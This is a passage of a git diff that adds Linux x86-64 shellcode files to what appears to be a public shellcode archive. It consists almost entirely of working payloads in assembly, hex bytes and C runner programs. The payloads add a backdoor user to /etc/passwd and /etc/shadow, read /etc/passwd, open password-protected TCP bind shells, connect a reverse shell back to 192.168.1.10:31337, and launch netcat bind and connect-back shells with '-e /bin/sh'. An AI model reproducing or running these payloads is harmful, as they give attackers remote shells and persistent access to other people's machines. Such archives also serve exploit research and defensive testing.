+"\x48\x31\xc0\x50\x5e\x50\x5a\x04\x02\x48\xbf\xff\xff\xff\xff\xff\x73\x77\x64\x48\xc1\xef\x28\x57\x48\xbf\x2f\x65\x74\x63\x2f\x70\x61\x73\x57\x48\x89\xe7\x66\xbe\x41\x04\x66\xba\x84\x02\x0f\x05\x31\xff\x40\x80\xc7\x03\xeb\x74\x41\x59\x41\xc6\x41\x30\x0a\x49\x8d\x31\xb0\x01\x48\x31\xd2\x48\x83\xc2\x31\x0f\x05\x31\xff\x40\x80\xc7\x03\x57\x58\x0f\x05\x48\x31\xc0\x50\x5e\x04\x02\x48\xbf\xff\xff\xff\xff\xff\x64\x6f\x77\x48\xc1\xef\x28\x57\x48\xbf\x2f\x65\x74\x63\x2f\x73\x68\x61\x57\x48\x89\xe7\x66\xbe\x41\x04\x66\xba\x84\x02\x0f\x05\x48\x31\xc0\x04\x01\x31\xff\x40\x80\xc7\x03\x49\x8d\x71\x31\x50\x5a\x80\xc2\x83\x0f\x05\x31\xff\x40\x80\xc7\x03\x57\x58\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\x87\xff\xff\xff\x70\x77\x6e\x65\x64\x3a\x78\x3a\x31\x30\x30\x31\x3a\x31\x30\x30\x32\x3a\x70\x77\x6e\x65\x64\x2c\x2c\x2c\x3a\x2f\x68\x6f\x6d\x65\x2f\x70\x77\x6e\x65\x64\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x70\x77\x6e\x65\x64\x3a\x24\x36\x24\x75\x69\x48\x37\x78\x2e\x76\x68\x69\x76\x44\x37\x4c\x4c\x58\x59\x24\x37\x73\x4b\x31\x4c\x31\x4b\x57\x2e\x43\x68\x71\x57\x51\x5a\x6f\x77\x33\x65\x73\x76\x70\x62\x57\x56\x58\x79\x52\x36\x4c\x41\x34\x33\x31\x74\x4f\x4c\x68\x4d\x6f\x52\x4b\x6a\x50\x65\x72\x6b\x47\x62\x78\x52\x51\x78\x64\x49\x4a\x4f\x32\x49\x61\x6d\x6f\x79\x6c\x37\x79\x61\x56\x4b\x55\x56\x6c\x51\x38\x44\x4d\x6b\x33\x67\x63\x48\x4c\x4f\x4f\x66\x2f\x3a\x31\x36\x32\x36\x31\x3a\x30\x3a\x39\x39\x39\x39\x39\x3a\x37\x3a\x3a\x3a\x0a"; + + + +int main() +{ + printf("Shellcode Length: %d\n", (int)strlen(code)); + (*(void (*)()) code)(); +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43564.c b/shellcodes/linux_x86-64/43564.c new file mode 100644 index 000000000..80f90f777 --- /dev/null +++ b/shellcodes/linux_x86-64/43564.c @@ -0,0 +1,45 @@ +; shellcode name add_user_password +; Author : Christophe G SLAE64-1337 +; Len : 273 bytes +; Language : Nasm +; "name = pwned ; pass = $pass$" +; add user and password with echo cmd +; tested kali linux , kernel 3.12 + + + +global _start + +_start: + jmp short findaddress + +_realstart: + pop rdi + xor byte [rdi + 7] , 0x41 ; replace A to null byte "/bin/shA" + xor byte [rdi + 10] ,0x41 ; same "-cA" + xor rdx , rdx + lea rdi , [rdi] + lea r9 , [rdi + 8] + lea r10 , [rdi + 11] + push rdx + push r10 + push r9 + push rdi + mov rsi , rsp + add al , 59 + syscall + + +findaddress: + call _realstart + string : db "/bin/shA-cAecho pwned:x:1001:1002:pwned,,,:/home/pwned:/bin/bash >> /etc/passwd ; echo pwned:\$6\$uiH7x.vhivD7LLXY\$7sK1L1KW.ChqWQZow3esvpbWVXyR6LA431tOLhMoRKjPerkGbxRQxdIJO2Iamoyl7yaVKUVlQ8DMk3gcHLOOf/:16261:0:99999:7::: >> /etc/shadow" + +unsigned char code[] = \ +"\xeb\x24\x5f\x80\x77\x07\x41\x80\x77\x0a\x41\x48\x31\xd2\x48\x8d\x3f\x4c\x8d\x4f\x08\x4c\x8d\x57\x0b\x52\x41\x52\x41\x51\x57\x48\x89\xe6\x04\x3b\x0f\x05\xe8\xd7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x2d\x63\x41\x65\x63\x68\x6f\x20\x70\x77\x6e\x65\x64\x3a\x78\x3a\x31\x30\x30\x31\x3a\x31\x30\x30\x32\x3a\x70\x77\x6e\x65\x64\x2c\x2c\x2c\x3a\x2f\x68\x6f\x6d\x65\x2f\x70\x77\x6e\x65\x64\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x3b\x20\x65\x63\x68\x6f\x20\x70\x77\x6e\x65\x64\x3a\x5c\x24\x36\x5c\x24\x75\x69\x48\x37\x78\x2e\x76\x68\x69\x76\x44\x37\x4c\x4c\x58\x59\x5c\x24\x37\x73\x4b\x31\x4c\x31\x4b\x57\x2e\x43\x68\x71\x57\x51\x5a\x6f\x77\x33\x65\x73\x76\x70\x62\x57\x56\x58\x79\x52\x36\x4c\x41\x34\x33\x31\x74\x4f\x4c\x68\x4d\x6f\x52\x4b\x6a\x50\x65\x72\x6b\x47\x62\x78\x52\x51\x78\x64\x49\x4a\x4f\x32\x49\x61\x6d\x6f\x79\x6c\x37\x79\x61\x56\x4b\x55\x56\x6c\x51\x38\x44\x4d\x6b\x33\x67\x63\x48\x4c\x4f\x4f\x66\x2f\x3a\x31\x36\x32\x36\x31\x3a\x30\x3a\x39\x39\x39\x39\x39\x3a\x37\x3a\x3a\x3a\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77" +; + +int main() +{ + printf("Shellcode Length: %d\n", (int)strlen(code)); + (*(void (*)()) code)(); +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43565.asm b/shellcodes/linux_x86-64/43565.asm new file mode 100644 index 000000000..6331cee76 --- /dev/null +++ b/shellcodes/linux_x86-64/43565.asm @@ -0,0 +1,51 @@ +BITS 64 +; Author Mr.Un1k0d3r - RingZer0 Team +; Read /etc/passwd Linux x86_64 Shellcode +; Shellcode size 82 bytes +global _start + +section .text + +_start: +jmp _push_filename + +_readfile: +; syscall open file +pop rdi ; pop path value +; NULL byte fix +xor byte [rdi + 11], 0x41 + +xor rax, rax +add al, 2 +xor rsi, rsi ; set O_RDONLY flag +syscall + +; syscall read file +sub sp, 0xfff +lea rsi, [rsp] +mov rdi, rax +xor rdx, rdx +mov dx, 0xfff; size to read +xor rax, rax +syscall + +; syscall write to stdout +xor rdi, rdi +add dil, 1 ; set stdout fd = 1 +mov rdx, rax +xor rax, rax +add al, 1 +syscall + +; syscall exit +xor rax, rax +add al, 60 +syscall + +_push_filename: +call _readfile +path: db "/etc/passwdA" + +Shellcode: + +\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41 \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43566.asm b/shellcodes/linux_x86-64/43566.asm new file mode 100644 index 000000000..1cbf3ce3c --- /dev/null +++ b/shellcodes/linux_x86-64/43566.asm @@ -0,0 +1,148 @@ +;Bind_TCP 4444 with password ; +;Default password = Password ; +;If connected the shellcode no prompt for password ; +;Enter password directly and you get the bin/sh shell; +;if password is wrong the shellcode exit: ; +;Christophe G SLAE64 - 1337 size 173 bytes ; + + + +global _start + + + +_start: + + +; sock = socket(AF_INET, SOCK_STREAM, 0) +; AF_INET = 2 +; SOCK_STREAM = 1 +; syscall number 41 + +push 0x29 +pop rax +push 0x2 +pop rdi +push 0x1 +pop rsi +xchg rbx , rdx +syscall + +; copy socket descriptor to rdi for future use +xchg rax , rdi + + +; server.sin_family = AF_INET +; server.sin_port = htons(PORT) +; server.sin_addr.s_addr = INADDR_ANY +; bzero(&server.sin_zero, 8) + +xor rax, rax + +mov dword [rsp - 4] , eax +mov word [rsp - 6] ,0x5c11 +mov byte [rsp - 8] , 0x2 +sub rsp , 8 + + +; bind(sock, (struct sockaddr *)&server, sockaddr_len) +; syscall number 49 +push 0x31 +pop rax +mov rsi, rsp +push 0x10 +pop rdx +syscall + + +; listen(sock, MAX_CLIENTS) +; syscall number 50 + +push 0x32 +pop rax +push 0x2 +pop rsi +syscall + + +; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len) +; syscall number 43 + + +push 0x2b +pop rax +sub rsp, 0x10 +mov rsi, rsp +push 0x10 +mov rdx, rsp + +syscall + +; store the client socket description +mov r9, rax + +; close parent +push 0x3 +pop rax +syscall + + + + + +xchg rdi , r9 +xor rsi , rsi + +dup2: + push 0x21 + pop rax + syscall + inc rsi + cmp rsi , 0x2 + loopne dup2 + +CheckPass: + xor rax , rax + push 0x10 + pop rdx + sub rsp , 16 ; 16 bytes to receive user input + mov rsi , rsp + xor edi , edi + syscall ; system read function call + mov rax , 0x64726f7773736150 ; "Password" + lea rdi , [rel rsi] + scasq + jz Execve + push 0x3c + pop rax + syscall + + + + + +Execve: + xor rax , rax + mov rdx , rax + push rax + + mov rbx, 0x68732f2f6e69622f + push rbx + + ; store /bin//sh address in RDI + mov rdi, rsp + + ; Second NULL push + push rax + + + ; Push address of /bin//sh + push rdi + + ; set RSI + mov rsi, rsp + + ; Call the Execve syscall + push 0x3b + pop rax + syscall \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43568.asm b/shellcodes/linux_x86-64/43568.asm new file mode 100644 index 000000000..ef3096748 --- /dev/null +++ b/shellcodes/linux_x86-64/43568.asm @@ -0,0 +1,107 @@ +/* +; Author Andriy Brukhovetskyy - doomedraven - SLAEx64 1322 +; 138 bytes +global _start +section .text +_start: + + ;socket syscall + push byte 0x29 ; 41 socket + pop rax + push byte 0x2 ; AF_INET + pop rdi + push byte 0x1 ; SOCK_STREAM + pop rsi + cdq ;rdx = 0 - ANY + syscall + + xchg rdi, rax ; save socket descriptor + + mov dword [rsp-4], 0x0901a8c0 ; ip + mov word [rsp-6], 0x5c11 ; port 4444 + mov byte [rsp-8], 0x02 + sub rsp, 8 + + push byte 0x2a ; connect + pop rax + mov rsi, rsp ; pointer + push byte 0x10 ; len + pop rdx + syscall + + push byte 0x3; counter + pop rsi + +dup2_loop: + dec rsi + push byte 0x21 + pop rax + syscall + jnz dup2_loop ; jump if not 0 + + ;read buffer + mov rdi, rax ; socket + ;xor rax, rax + cdq + mov byte [rsp-1], al ;0 read + sub rsp, 1 + + push rdx + lea rsi, [rsp-0x10] ; 16 bytes from buf + add dl, 0x10 ; size_t count + syscall + + ;test passcode + mov rax, 0x617264656d6f6f64 ; passcode 'doomedra'[::-1].encode('hex') + push rdi ; save the socket + lea rdi, [rsi] ; load string from address + scasq ; compare + jz accepted_passwd ; jump if equal + + ;exit if different :P + push byte 0x3c + pop rax + syscall + +accepted_passwd: + + ;execve + pop rdi; socket + xor rax, rax + mov rbx, 0x68732f2f6e69622f ;/bin//sh in reverse + push rbx + mov rdi, rsp + push rax + mov rdx, rsp + push rdi + mov rsi, rsp + add al, 0x3b + syscall +*/ + +#include +#include + +// 138 bytes +unsigned char code[] =\ +"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05" +"\x48\x97\xc7\x44\x24\xfc" +"\xc0\xa8\x01\x09\x66\xc7\x44\x24\xfa" +"\x11\x5c" //port big endiant +"\xc6\x44\x24\xf8\x02\x48\x83" +"\xec\x08\x6a\x2a\x58\x48\x89\xe6\x6a\x10\x5a\x0f" +"\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05" +"\x75\xf6\x48\x89\xc7\x99\x88\x44\x24\xff\x48\x83" +"\xec\x01\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10\x0f" +"\x05\x48\xb8\x64\x6f\x6f\x6d\x65\x64\x72\x61\x57" +"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05" +"\x5f\x48\x31\xc0\x48\xbb\x2f\x62\x69\x6e\x2f\x2f" +"\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48" +"\x89\xe6\x04\x3b\x0f\x05"; + +main() +{ + printf("Shellcode Length: %d\n", (int)strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43570.asm b/shellcodes/linux_x86-64/43570.asm new file mode 100644 index 000000000..5b0b8cf5e --- /dev/null +++ b/shellcodes/linux_x86-64/43570.asm @@ -0,0 +1,134 @@ +/* +;Author - Andriy Brukhovetskyy - doomedraven - SLAEx64 - 1322 +;175 bytes +;http://www.doomedraven.com/2014/05/slaex64-shellbindtcp-with-passcode.html + +global _start +section .text +_start: + push byte 0x29 ; 41 - socket syscall + pop rax + push byte 0x02 ; AF_INET + pop rdi + push byte 0x01 ; SOCK_STREAM + pop rsi + cdq + syscall + + ;copy socket descriptor to rdi for future use + ;bind + xchg rdi, rax + xor rax, rax + mov dword [rsp-4], eax ;INADDR_ANY + mov word [rsp-6], 0x5c11 ;PORT 4444 + mov byte [rsp-8], 0x2 ;AF_INET + sub rsp, 0x8 + + push byte 0x31 ;49 bind + pop rax + mov rsi, rsp + cdq + add dl, 16 ;len + syscall + + ;listen + push byte 0x32 ;listen + pop rax + ;push byte 0x02 ;max clients + ;pop rsi + syscall + + push byte 0x2b ; accept + pop rax + sub rsp, 0x10 ; adjust + xor rsi, rsi + mov rsi, rsp ; pointer + mov byte [rsp-1], 0x10 ;len + sub rsp, 0x01 ; adjust + cdq + mov rdx, rsp ; pointer + syscall + + ;read buffer + mov rdi, rax ; socket + xor rax, rax + mov byte [rsp-1], al ;0 read + sub rsp, 1 + cdq + push rdx ; 0 stdin + lea rsi, [rsp-0x10] ; 16 bytes from buffer + add dl, 0x10 ; len + syscall + + ;test passcode + mov rax, 0x617264656d6f6f64 ; passcode 'doomedra'[::-1].encode('hex') + push rdi ; save the socket + lea rdi, [rsi] ; load string from address + scasq ; compare + jz accepted_passwd ; jump if equal + + ;exit if different :P + xor rax, rax + add al, 60 + syscall + +accepted_passwd: + + pop rdi; socket + push byte 0x03 + pop rsi + +dup2_loop: + dec rsi + push byte 0x21 + pop rax + syscall + jnz dup2_loop ; jump if not 0 + + push rsi; 0 + + ;execve + ;push /bin//sh in reverse + mov rbx, 0x68732f2f6e69622f + push rbx + + mov rdi, rsp + push rsi + + mov rdx, rsp + push rdi + + mov rsi, rsp + push byte 0x3b + pop rax + syscall + +*/ + +#include +#include + +// 175 bytes +unsigned char code[] =\ +"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05" +"\x48\x97\x48\x31\xc0\x89\x44\x24\xfc\x66\xc7\x44" +"\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec" +"\x08\x6a\x31\x58\x48\x89\xe6\x99\x80\xc2\x10\x0f" +"\x05\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x48\x83\xec" +"\x10\x48\x31\xf6\x48\x89\xe6\xc6\x44\x24\xff\x10" +"\x48\x83\xec\x01\x99\x48\x89\xe2\x0f\x05\x48\x89" +"\xc7\x48\x31\xc0\x88\x44\x24\xff\x48\x83\xec\x01" +"\x99\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10\x0f\x05" +"\x48\xb8\x64\x6f\x6f\x6d\x65\x64\x72\x61\x57\x48" +"\x8d\x3e\x48\xaf\x74\x07\x48\x31\xc0\x04\x3c\x0f" +"\x05\x5f\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f" +"\x05\x75\xf6\x56\x48\xbb\x2f\x62\x69\x6e\x2f\x2f" +"\x73\x68\x53\x48\x89\xe7\x56\x48\x89\xe2\x57\x48" +"\x89\xe6\x6a\x3b\x58\x0f\x05"; + +main() +{ + printf("Shellcode Length: %d\n", (int)strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43597.c b/shellcodes/linux_x86-64/43597.c new file mode 100644 index 000000000..0556f4cc2 --- /dev/null +++ b/shellcodes/linux_x86-64/43597.c @@ -0,0 +1,77 @@ +/* + + Shell Bind TCP Random Port Shellcode - C Language - Linux/x86_64 + Copyright (C) 2013 Geyslan G. Bem, Hacking bits + + http://hackingbits.com + geyslan@gmail.com + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see + +*/ + + +/* + + shell_bind_tcp_random_port_shellcode_x86_64 + assembly source: https://github.com/geyslan/SLAE/blob/master/improvements/shell_bind_tcp_random_port_x86_64.asm + + * 57 bytes + * null-free + + + # gcc -m64 -fno-stack-protector -z execstack shell_bind_tcp_random_port_shellcode_x86_64.c -o shell_bind_tcp_random_port_shellcode_x86_64 + + Testing + # ./shell_bind_tcp_random_port_shellcode_x86_64 + # netstat -anp | grep shell + # nmap -sS 127.0.0.1 -p- (It's necessary to use the TCP SYN scan option [-sS]; thus avoids that nmap connects to the port open by shellcode) + # nc 127.0.0.1 port + +*/ + + +#include +#include + +unsigned char code[] = \ + +"\x48\x31\xf6\x48\xf7\xe6\xff\xc6\x6a\x02" +"\x5f\xb0\x29\x0f\x05\x52\x5e\x50\x5f\xb0" +"\x32\x0f\x05\xb0\x2b\x0f\x05\x57\x5e\x48" +"\x97\xff\xce\xb0\x21\x0f\x05\x75\xf8\x52" +"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" +"\x57\x54\x5f\xb0\x3b\x0f\x05"; + +main () +{ + + // When contains null bytes, printf will show a wrong shellcode length. + + printf("Shellcode Length: %d\n", strlen(code)); + + // Pollutes all registers ensuring that the shellcode runs in any circumstance. + + __asm__ ("mov $0xffffffffffffffff, %rax\n\t" + "mov %rax, %rbx\n\t" + "mov %rax, %rcx\n\t" + "mov %rax, %rdx\n\t" + "mov %rax, %rsi\n\t" + "mov %rax, %rdi\n\t" + "mov %rax, %rbp\n\t" + + // Calling the shellcode + "call code"); + +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43598.c b/shellcodes/linux_x86-64/43598.c new file mode 100644 index 000000000..f8c55487d --- /dev/null +++ b/shellcodes/linux_x86-64/43598.c @@ -0,0 +1,112 @@ +/* +Title : tcpbindshell (150 bytes) +Date : 04 October 2013 +Author : Russell Willis +Testd on: Linux/x86_64 (SMP Debian 3.2.46-1+deb7u1 x86_64 GNU/Linux) + +$ objdump -D tcpbindshell -M intel +tcpbindshell: file format elf64-x86-64 +Disassembly of section .text: + +0000000000400080 <_start>: + 400080: 48 31 c0 xor rax,rax + 400083: 48 31 ff xor rdi,rdi + 400086: 48 31 f6 xor rsi,rsi + 400089: 48 31 d2 xor rdx,rdx + 40008c: 4d 31 c0 xor r8,r8 + 40008f: 6a 02 push 0x2 + 400091: 5f pop rdi + 400092: 6a 01 push 0x1 + 400094: 5e pop rsi + 400095: 6a 06 push 0x6 + 400097: 5a pop rdx + 400098: 6a 29 push 0x29 + 40009a: 58 pop rax + 40009b: 0f 05 syscall + 40009d: 49 89 c0 mov r8,rax + 4000a0: 4d 31 d2 xor r10,r10 + 4000a3: 41 52 push r10 + 4000a5: 41 52 push r10 + 4000a7: c6 04 24 02 mov BYTE PTR [rsp],0x2 + 4000ab: 66 c7 44 24 02 7a 69 mov WORD PTR [rsp+0x2],0x697a + 4000b2: 48 89 e6 mov rsi,rsp + 4000b5: 41 50 push r8 + 4000b7: 5f pop rdi + 4000b8: 6a 10 push 0x10 + 4000ba: 5a pop rdx + 4000bb: 6a 31 push 0x31 + 4000bd: 58 pop rax + 4000be: 0f 05 syscall + 4000c0: 41 50 push r8 + 4000c2: 5f pop rdi + 4000c3: 6a 01 push 0x1 + 4000c5: 5e pop rsi + 4000c6: 6a 32 push 0x32 + 4000c8: 58 pop rax + 4000c9: 0f 05 syscall + 4000cb: 48 89 e6 mov rsi,rsp + 4000ce: 48 31 c9 xor rcx,rcx + 4000d1: b1 10 mov cl,0x10 + 4000d3: 51 push rcx + 4000d4: 48 89 e2 mov rdx,rsp + 4000d7: 41 50 push r8 + 4000d9: 5f pop rdi + 4000da: 6a 2b push 0x2b + 4000dc: 58 pop rax + 4000dd: 0f 05 syscall + 4000df: 59 pop rcx + 4000e0: 4d 31 c9 xor r9,r9 + 4000e3: 49 89 c1 mov r9,rax + 4000e6: 4c 89 cf mov rdi,r9 + 4000e9: 48 31 f6 xor rsi,rsi + 4000ec: 6a 03 push 0x3 + 4000ee: 5e pop rsi +00000000004000ef : + 4000ef: 48 ff ce dec rsi + 4000f2: 6a 21 push 0x21 + 4000f4: 58 pop rax + 4000f5: 0f 05 syscall + 4000f7: 75 f6 jne 4000ef + 4000f9: 48 31 ff xor rdi,rdi + 4000fc: 57 push rdi + 4000fd: 57 push rdi + 4000fe: 5e pop rsi + 4000ff: 5a pop rdx + 400100: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f + 400107: 2f 73 68 + 40010a: 48 c1 ef 08 shr rdi,0x8 + 40010e: 57 push rdi + 40010f: 54 push rsp + 400110: 5f pop rdi + 400111: 6a 3b push 0x3b + 400113: 58 pop rax + 400114: 0f 05 syscall + + Code not is not optimal, this is left as an exercise to the reader ;^) + +*/ + +#include + +#define PORT "\x7a\x69" /* 31337 */ + +unsigned char code[] = \ +"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a" +"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0" +"\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02" +PORT"\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05" +"\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31" +"\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59" +"\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48" +"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" +"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" +"\x5f\x6a\x3b\x58\x0f\x05"; + +int +main(void) +{ + printf("Shellcode Length: %d\n", (int)sizeof(code)-1); + int (*ret)() = (int(*)())code; + ret(); + return 0; +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43599.c b/shellcodes/linux_x86-64/43599.c new file mode 100644 index 000000000..ca464aea2 --- /dev/null +++ b/shellcodes/linux_x86-64/43599.c @@ -0,0 +1,92 @@ +/* +Title : reversetcpbindshell (118 bytes) +Date : 04 October 2013 +Author : Russell Willis +Testd on: Linux/x86_64 (SMP Debian 3.2.46-1+deb7u1 x86_64 GNU/Linux) + +$ objdump -D reversetcpbindshell -M intel +reversetcpbindshell: file format elf64-x86-64 +Disassembly of section .text: + +0000000000400080 <_start>: + 400080: 48 31 c0 xor rax,rax + 400083: 48 31 ff xor rdi,rdi + 400086: 48 31 f6 xor rsi,rsi + 400089: 48 31 d2 xor rdx,rdx + 40008c: 4d 31 c0 xor r8,r8 + 40008f: 6a 02 push 0x2 + 400091: 5f pop rdi + 400092: 6a 01 push 0x1 + 400094: 5e pop rsi + 400095: 6a 06 push 0x6 + 400097: 5a pop rdx + 400098: 6a 29 push 0x29 + 40009a: 58 pop rax + 40009b: 0f 05 syscall + 40009d: 49 89 c0 mov r8,rax + 4000a0: 48 31 f6 xor rsi,rsi + 4000a3: 4d 31 d2 xor r10,r10 + 4000a6: 41 52 push r10 + 4000a8: c6 04 24 02 mov BYTE PTR [rsp],0x2 + 4000ac: 66 c7 44 24 02 7a 69 mov WORD PTR [rsp+0x2],0x697a + 4000b3: c7 44 24 04 0a 33 35 mov DWORD PTR [rsp+0x4],0x435330a + 4000ba: 04 + 4000bb: 48 89 e6 mov rsi,rsp + 4000be: 6a 10 push 0x10 + 4000c0: 5a pop rdx + 4000c1: 41 50 push r8 + 4000c3: 5f pop rdi + 4000c4: 6a 2a push 0x2a + 4000c6: 58 pop rax + 4000c7: 0f 05 syscall + 4000c9: 48 31 f6 xor rsi,rsi + 4000cc: 6a 03 push 0x3 + 4000ce: 5e pop rsi +00000000004000cf : + 4000cf: 48 ff ce dec rsi + 4000d2: 6a 21 push 0x21 + 4000d4: 58 pop rax + 4000d5: 0f 05 syscall + 4000d7: 75 f6 jne 4000cf + 4000d9: 48 31 ff xor rdi,rdi + 4000dc: 57 push rdi + 4000dd: 57 push rdi + 4000de: 5e pop rsi + 4000df: 5a pop rdx + 4000e0: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f + 4000e7: 2f 73 68 + 4000ea: 48 c1 ef 08 shr rdi,0x8 + 4000ee: 57 push rdi + 4000ef: 54 push rsp + 4000f0: 5f pop rdi + 4000f1: 6a 3b push 0x3b + 4000f3: 58 pop rax + 4000f4: 0f 05 syscall + + Code not is not optimal, this is left as an exercise to the reader ;^) + +*/ + +#include + +#define IPADDR "\xc0\x80\x10\x0a" /* 192.168.1.10 */ +#define PORT "\x7a\x69" /* 31337 */ + +unsigned char code[] = \ +"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a" +"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0" +"\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24" +"\x02"PORT"\xc7\x44\x24\x04"IPADDR"\x48\x89\xe6\x6a\x10" +"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" +"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" +"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" +"\x5f\x6a\x3b\x58\x0f\x05"; + +int +main(void) +{ + printf("Shellcode Length: %d\n", (int)sizeof(code)-1); + int (*ret)() = (int(*)())code; + ret(); + return 0; +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43601.asm b/shellcodes/linux_x86-64/43601.asm new file mode 100644 index 000000000..8ca1c6d38 --- /dev/null +++ b/shellcodes/linux_x86-64/43601.asm @@ -0,0 +1,64 @@ +; { Title: Shellcode linux/x86-64 bind-shell with netcat } + +; Author : Gaussillusion +; Len : 131 bytes +; Language : Nasm + + + +BITS 64 +xor rdx,rdx +mov rdi,0x636e2f6e69622fff +shr rdi,0x08 +push rdi +mov rdi,rsp + +mov rcx,0x68732f6e69622fff +shr rcx,0x08 +push rcx +mov rcx,rsp + +mov rbx,0x652dffffffffffff +shr rbx,0x30 +push rbx +mov rbx,rsp + +mov r10,0x37333331ffffffff +shr r10,0x20 +push r10 +mov r10,rsp + +mov r9,0x702dffffffffffff +shr r9,0x30 +push r9 +mov r9,rsp + +mov r8,0x6c2dffffffffffff +shr r8,0x30 +push r8 +mov r8,rsp + +push rdx ;push NULL +push rcx ;push address of 'bin/sh' +push rbx ;push address of '-e' +push r10 ;push address of '1337' +push r9 ;push address of '-p' +push r8 ;push address of '-l' +push rdi ;push address of '/bin/nc' + +mov rsi,rsp +mov al,59 +syscall + +; _bytecode_start_ +;\x48\x31\xd2\x48\xbf\xff\x2f\x62\x69\x6e\x2f\x6e\x63 +;\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb9\xff\x2f\x62 +;\x69\x6e\x2f\x73\x68\x48\xc1\xe9\x08\x51\x48\x89\xe1 +;\x48\xbb\xff\xff\xff\xff\xff\xff\x2d\x65\x48\xc1\xeb +;\x30\x53\x48\x89\xe3\x49\xba\xff\xff\xff\xff\x31\x33 +;\x33\x37\x49\xc1\xea\x20\x41\x52\x49\x89\xe2\x49\xb9 +;\xff\xff\xff\xff\xff\xff\x2d\x70\x49\xc1\xe9\x30\x41 +;\x51\x49\x89\xe1\x49\xb8\xff\xff\xff\xff\xff\xff\x2d +;\x6c\x49\xc1\xe8\x30\x41\x50\x49\x89\xe0\x52\x51\x53 +;\x41\x52\x41\x51\x41\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05 +; _bytecode_end_ \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43602.asm b/shellcodes/linux_x86-64/43602.asm new file mode 100644 index 000000000..48d3516e6 --- /dev/null +++ b/shellcodes/linux_x86-64/43602.asm @@ -0,0 +1,62 @@ +; { Title: Shellcode linux/x86-64 connect back shell } + +; Author : Gaussillusion +; Len : 109 bytes +; Language : Nasm + +;syscall: execve("/bin/nc",{"/bin/nc","ip","1337","-e","/bin/sh"},NULL) + +BITS 64 +xor rdx,rdx +mov rdi,0x636e2f6e69622fff +shr rdi,0x08 +push rdi +mov rdi,rsp + +mov rcx,0x68732f6e69622fff +shr rcx,0x08 +push rcx +mov rcx,rsp + +mov rbx,0x652dffffffffffff +shr rbx,0x30 +push rbx +mov rbx,rsp + +mov r10,0x37333331ffffffff +shr r10,0x20 